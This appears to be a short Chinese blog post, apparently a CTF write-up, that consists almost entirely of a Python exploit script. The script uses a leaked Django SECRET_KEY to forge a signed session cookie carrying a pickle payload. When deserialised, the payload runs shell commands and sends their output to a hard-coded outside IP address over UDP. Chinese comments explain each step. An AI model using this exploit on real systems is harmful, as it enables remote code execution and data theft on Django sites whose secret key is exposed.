Gift

2019-06-12  本文已影响0人  Yix1a

c62s的生日礼物

# coding: utf-8
# Django-1.5.12
from django.contrib.sessions.serializers import PickleSerializer
from django.core import signing
from django.conf import settings

settings.configure(SECRET_KEY='oa4$kkk802=rfm@tl^e5yb3qvs_ea3r!m*&j+#_+s-9=xcieci') #得到的SECRET_KEY


class GetShellWithPython(object):
    def __reduce__(self):
        import subprocess
        return (subprocess.call,    #用于连接指定的远程服务器和端口并传送命令的结果
                (['python','-c',
                  'import socket, os;c=os.popen("ls").read().strip();'
                  's=socket.socket(socket.AF_INET, socket.SOCK_DGRAM);'
                  's.sendto(c, ("45.63.40.88", 1000));'],))   #远程服务器和端口


sess = signing.dumps(
    obj=GetShellWithPython(),
    serializer=PickleSerializer,
    salt='django.contrib.sessions.backends.signed_cookies'
)
print sess #sess为sessionid之类的东西,得到sess发出去。


上一篇 下一篇

猜你喜欢

热点阅读